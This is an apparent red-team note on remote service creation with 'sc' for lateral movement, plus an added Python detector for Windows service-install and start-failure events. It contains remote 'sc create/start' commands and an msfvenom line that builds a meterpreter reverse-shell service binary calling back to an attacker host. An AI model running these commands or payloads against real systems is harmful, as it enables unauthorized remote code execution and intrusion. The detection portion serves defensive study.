
Service Control (SC)

Administrator rights on the target machine are mandatory.
The Service Controller (sc) proves particularly valuable for attackers, enabling task scheduling via SMB.
sc \\host.domain create ExampleService binpath= "c:\windows\system32\calc.exe"
sc \\host.domain start ExampleService
The caveat is that the executable must be a service binary. Service binaries differ in that they need to "register" with the Service Control Manager (SCM); if they do not, execution is terminated. Hence, if a non-service binary is used for this purpose, the agent/beacon will call back for a brief moment and then terminate.
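For defenders, the caveat above leaves a trace: a newly installed service (System log Event ID 7045) followed shortly by a start timeout or failure (7009 / 7000) for the same service name. The following is an added example, not part of the original page; the sample records are constructed and the dictionary field names are a simplified assumption about how the events were exported.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the page): a simplified view of
# Service Control Manager events from the Windows System log.
# 7045 = service installed, 7009 = timeout waiting for the service to
# connect, 7000 = service failed to start.
EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 7045, "service": "ExampleService",
     "image_path": r"c:\windows\system32\calc.exe", "account": "LocalSystem"},
    {"time": "2024-05-01T10:00:31", "id": 7009, "service": "ExampleService"},
    {"time": "2024-05-01T10:00:31", "id": 7000, "service": "ExampleService"},
    {"time": "2024-05-01T11:15:00", "id": 7045, "service": "BackupAgent",
     "image_path": r"C:\Program Files\Backup\agent.exe", "account": "LocalSystem"},
    {"time": "2024-05-01T12:00:00", "id": 7000, "service": "Spooler"},
]

START_FAILURES = {7000, 7009}


def find_failed_new_services(events, window=timedelta(minutes=5)):
    """Return installs (7045) followed by a start failure within `window`."""
    installs = {}   # service name (lower-cased) -> (install time, event)
    hits = []
    # ISO 8601 timestamps sort correctly as strings; the sort is stable.
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        name = ev["service"].lower()
        if ev["id"] == 7045:
            installs[name] = (when, ev)
        elif ev["id"] in START_FAILURES and name in installs:
            installed_at, install_ev = installs.pop(name)  # report once
            if when - installed_at <= window:
                hits.append({
                    "service": install_ev["service"],
                    "image_path": install_ev["image_path"],
                    "installed": install_ev["time"],
                    "failed_event": ev["id"],
                    "seconds_to_failure": int((when - installed_at).total_seconds()),
                })
    return hits


if __name__ == "__main__":
    for hit in find_failed_new_services(EVENTS):
        print(hit)
```

A service that was installed long ago and fails to start (the constructed `Spooler` record) is ignored, as is a new service that starts cleanly.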
Directly creating an executable that runs as a service is possible:
In Cobalt Strike, navigate to Attacks > Packages > Windows Executable (S), and select the Service Binary output type.
Windows executable as a service in Cobalt Strike
Using msfvenom, specify the exe-service format:
msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST=<IP> LPORT=<PORT> -o service.exe